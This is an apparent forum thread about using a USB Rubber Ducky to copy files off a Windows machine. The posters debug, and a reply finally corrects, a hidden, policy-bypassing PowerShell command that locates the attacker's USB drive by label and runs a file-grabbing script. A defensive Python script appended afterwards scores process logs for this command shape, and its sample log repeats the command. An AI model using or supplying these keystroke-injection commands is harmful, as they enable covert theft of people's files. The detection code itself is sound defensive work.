grahamjohnson77 Posted October 27, 2018

All, I have started to learn the rubber ducky and followed the vblog on exfiltration of files from a system using the ducky. I built everything and all components are working except the initial drive find in PowerShell.

Learning from vblog: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - Love these guys (shout out from Italy via Ireland!)

For testing only (while I get more experience of the ducky), I have an external USB drive that I am using (e.g. F:\). That contains all the required files for d.bat, e.bat and the cscript i.vbs. Files are copied to the slurp folder here. Then I plug in my rubber ducky to start the attack. That ducky script looks for the drive with label "PD" (which is F:\) for the required d.bat to start the attack.

Using my testing/debugging, I know that if I run the PowerShell cmd directly in a PowerShell CLI, the attack works with no issues. Then, I can hard-code the drive letter of F:\ and again, no issues. My slurp has the extracted PDF files. The only thing I can think it could be is that the system locale is Italian with an Italian keyboard. But I am compiling it with the ITALIAN encoder and it works in other ways.

REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "$u=gwmi win32_volume -Filter Label="`"PD"`";cd $u.Name;.\d.cmd"
REM This one is working directly from Run -> Start!!!
REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "F:\d.cmd"
REM This one is working directly from Run -> Start!!! But Not Ducky!
REM STRING powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'PD'}|select name;cd $u.name;.\d.cmd"
REM This one is working but I don't want to hard-code it obviously! Just to try and confirm it is working as expected!
REM STRING powershell -NoP -NonI -W H -Exec Bypass "e:\d.cmd"
REM My latest attempt! Still no luck!
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"
ENTER

I did see some errors about the select from win32_volume not being valid etc. last night during troubleshooting, so I think I would be seeing some PowerShell error if the string format was incorrect etc. Any ideas of how to troubleshoot this line only from the Rubber Ducky payload when the Ducky is running? (Again, I can put it into PowerShell directly and it works!)

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"

Thank you.
grahamjohnson77 (Author) Posted October 27, 2018

BTW, all of the REMs are my attempts to try all different ways to get one to work. I have been online checking for suggestions too!
grahamjohnson77 (Author) Posted October 27, 2018

This works directly from the PS CLI:

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"

but not when run from the ducky.
PoSHMagiC0de Posted November 6, 2018 (edited)

Try this:

powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;"

You passed the name already. No need to reference it in the variable. Surprised it even works in your stand-alone tests unless you are already in the folder with the d.cmd file. Also, to remove the extra (") that might be terminating the string, you can use "{}" for the filter statement in PowerShell.

Edited November 7, 2018 by PoSHMagiC0de: Forgot the C parameter.
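The launch shape discussed in this thread (a hidden, non-interactive PowerShell with the execution policy bypassed, a WMI lookup of a volume by label, and a .cmd run from the resolved path) is also a useful shape to recognise in process-creation telemetry. The following is an added example, not code from the thread, from Hak5 or from either poster: a small Python triage script that scores Sysmon Event ID 1 / Security 4688-style records against those indicators. The sample log lines, the field layout, the indicator weights and the alert/review thresholds are all constructed assumptions for the example and would need tuning against real telemetry.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation records, tab-separated as
# timestamp, ParentImage, Image, CommandLine. Invented for this example;
# in practice the fields come from Sysmon Event ID 1 or Security 4688.
SAMPLE_LOG = "\n".join([
    "2018-10-27T10:01:02Z\tC:\\Windows\\explorer.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -C "
    "\"$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\\d.cmd;\"",
    "2018-10-27T10:05:40Z\tC:\\Windows\\System32\\cmd.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell -NoProfile -Command \"Get-Process | Sort-Object CPU -Descending\"",
    "2018-10-27T10:06:11Z\tC:\\Windows\\explorer.exe"
    "\tC:\\Windows\\System32\\notepad.exe\tnotepad.exe report.txt",
    "2018-10-27T10:09:55Z\tC:\\Windows\\System32\\svchost.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
])

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Indicator name -> (regex, weight). Regexes accept the abbreviated and
# full parameter spellings PowerShell allows; weights are assumptions.
INDICATORS = {
    "hidden_window":    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    "exec_bypass":      (re.compile(r"-e(?:p|x|xec|xecutionpolicy)?\s+bypass\b", re.I), 2),
    "non_interactive":  (re.compile(r"-noni(?:nteractive)?\b", re.I), 1),
    "no_profile":       (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "wmi_volume_query": (re.compile(r"(?:gwmi|get-wmiobject|get-ciminstance)\s+win32_volume\b", re.I), 2),
    "relative_script":  (re.compile(r"\.\\[\w.-]+\.(?:cmd|bat)\b", re.I), 2),
}

ALERT_THRESHOLD = 6   # assumed: the full exfil-style chain scores well above this
REVIEW_THRESHOLD = 3  # assumed: hidden + bypass alone lands here


@dataclass
class Finding:
    timestamp: str
    image: str
    score: int
    matched: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.score >= ALERT_THRESHOLD:
            return "alert"
        if self.score >= REVIEW_THRESHOLD:
            return "review"
        return "ok"


def is_powershell(image: str) -> bool:
    """True when the Image basename is a PowerShell host."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() in POWERSHELL_IMAGES


def score_commandline(cmdline: str):
    """Return (score, [matched indicator names]) for one command line."""
    matched = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[name][1] for name in matched)
    return score, matched


def parse_line(line: str) -> dict:
    """Split one tab-separated record; CommandLine may itself contain tabs."""
    ts, parent, image, cmdline = line.split("\t", 3)
    return {"timestamp": ts, "parent": parent, "image": image, "cmdline": cmdline}


def triage(log_text: str) -> list:
    """Score every record; non-PowerShell images get score 0 without matching."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if not is_powershell(ev["image"]):
            findings.append(Finding(ev["timestamp"], ev["image"], 0))
            continue
        score, matched = score_commandline(ev["cmdline"])
        findings.append(Finding(ev["timestamp"], ev["image"], score, matched))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.timestamp} {f.verdict:6} score={f.score:2} {','.join(f.matched) or '-'}")
```

Run stand-alone it prints one line per record: the thread's command shape scores 10 and is flagged "alert", the plain `Get-Process` query scores 1, the notepad launch is skipped, and a hidden-window script with the policy bypassed but no volume lookup or relative .cmd scores 4 and lands in "review". The point of the weighting is that no single switch is conclusive (administrators do run hidden PowerShell), while the combination the thread converges on is distinctive enough to alert on.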